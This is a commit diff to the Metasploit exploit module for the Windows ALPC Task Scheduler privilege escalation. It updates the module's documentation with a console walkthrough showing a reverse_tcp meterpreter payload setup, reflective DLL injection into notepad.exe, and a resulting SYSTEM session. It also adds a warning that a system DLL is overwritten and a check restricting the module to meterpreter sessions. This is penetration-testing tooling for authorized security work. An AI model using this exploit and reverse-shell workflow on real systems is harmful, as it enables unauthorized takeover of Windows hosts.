specify meterpreter, update documentation

Warning is after spell...
2018-09-21 12:30:36 -05:00 · 2018-09-21 12:30:36 -05:00 · 47bf780b88
parent c9de43c8d0
commit 47bf780b88
2 changed files with 55 additions and 17 deletions
--- a/documentation/modules/exploit/windows/local/alpc_taskscheduler.md
+++ b/documentation/modules/exploit/windows/local/alpc_taskscheduler.md
@ -1,6 +1,12 @@
 ## Description

-On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to `.job` files located in `c:\windows\tasks` because the scheduler does not use impersonation when checking this location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file. This module has been tested against Windows 10 Pro x64.
+On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to `.job` files located in `c:\windows\tasks` because the scheduler does not use impersonation when checking this location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file.
+
+WARNING:
+The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
+will be overwritten when the exploit runs.
+
+This module has been tested against Windows 10 Pro x64.

 ## Vulnerable Application

@ -21,29 +27,43 @@ Affected Windows OS versions and related patch details can be found in the [Micr
 ### Tested on Windows 10 Pro Version 1803 x64

 ```
+msf5 > use exploit/windows/local/alpc_taskscheduler
+msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
 msf5 exploit(windows/local/alpc_taskscheduler) > sessions

 Active sessions
 ===============

-  Id  Name  Type                     Information                               Connection
-  --  ----  ----                     -----------                               ----------
-  1         meterpreter x64/windows  DESKTOP-IPOGIJR\msfdev @ DESKTOP-IPOGIJR  172.22.222.243:4444 -> 172.22.222.200:50490 (172.22.222.200)
+  Id  Name  Type                     Information                                                                       Connection
+  --  ----  ----                     -----------                                                                       ----------
+  1         shell x64/windows        Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al...  172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200)
+  2         meterpreter x64/windows  DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR                                       172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200)

-msf5 exploit(windows/local/alpc_taskscheduler) > run
+msf5 exploit(windows/local/alpc_taskscheduler) > set session 1
+session => 1
+msf5 exploit(windows/local/alpc_taskscheduler) > exploit

-[*] Started reverse TCP handler on 172.22.222.243:4444 
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[-] Exploit aborted due to failure: none: Only meterpreter sessions are supported
+[*] Exploit completed, but no session was created.
+msf5 exploit(windows/local/alpc_taskscheduler) > set session 2
+session => 2
+msf5 exploit(windows/local/alpc_taskscheduler) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
 [*] Checking target...
-[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
-[*] Payload (5120 bytes) uploaded on DESKTOP-IPOGIJR to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll
-[*] Target Looks Good... trying to start notepad
-[*] Launching notepad to host the exploit...
-[+] Process 3768 launched.
-[*] Attempting to change the payload path to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll...
-[*] Reflectively injecting the exploit DLL into 3768...
+[*] Target Looks Good... trying to start notepad.exe
+[*] Launching notepad.exe to host the exploit...
+[+] Process 6140 launched.
+[*] Writing payload dll into process 6140 memory
+[*] Reflectively injecting the exploit DLL into 6140...
 [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
 [*] Sending stage (206403 bytes) to 172.22.222.200
-[*] Meterpreter session 2 opened (172.22.222.243:4444 -> 172.22.222.200:50491) at 2018-09-17 17:37:07 -0500
+[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:50492) at 2018-09-21 12:28:00 -0500

 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
@ -53,7 +73,17 @@ OS              : Windows 10 (Build 17134).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
-Logged On Users : 2
+Logged On Users : 3
 Meterpreter     : x64/windows
-meterpreter >
+meterpreter > background
+[*] Backgrounding session 3...
+msf5 exploit(windows/local/alpc_taskscheduler) > set session 3
+session => 3
+msf5 exploit(windows/local/alpc_taskscheduler) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Checking target...
+[-] Exploit aborted due to failure: none: Session is already elevated
+[*] Exploit completed, but no session was created.
+msf5 exploit(windows/local/alpc_taskscheduler) >
 ```
--- a/modules/exploits/windows/local/alpc_taskscheduler.rb
+++ b/modules/exploits/windows/local/alpc_taskscheduler.rb
@ -9,7 +9,7 @@ require 'msf/core/post/windows/registry'         #TODO: Do we need this?
 require 'msf/core/exploit/exe'

 class MetasploitModule < Msf::Exploit::Local
-  Rank = ExcellentRanking
+  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
@ -27,6 +27,10 @@ class MetasploitModule < Msf::Exploit::Local
        created to a file the user has read access to. After creating a hardlink, the vulnerability
        can be triggered to set the DACL on the linked file.

+        WARNING:
+        The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
+        will be overwritten when the exploit runs.
+
        This module has been tested against Windows 10 Pro x64.
      ),
      'License'        => MSF_LICENSE,
@ -114,6 +118,10 @@ class MetasploitModule < Msf::Exploit::Local
  end

  def exploit
+    unless session.type == 'meterpreter'
+      fail_with(Failure::None, 'Only meterpreter sessions are supported')
+    end
+
    payload_dll = generate_payload_dll
    process_name = datastore['PROCESS'] || 'notepad.exe'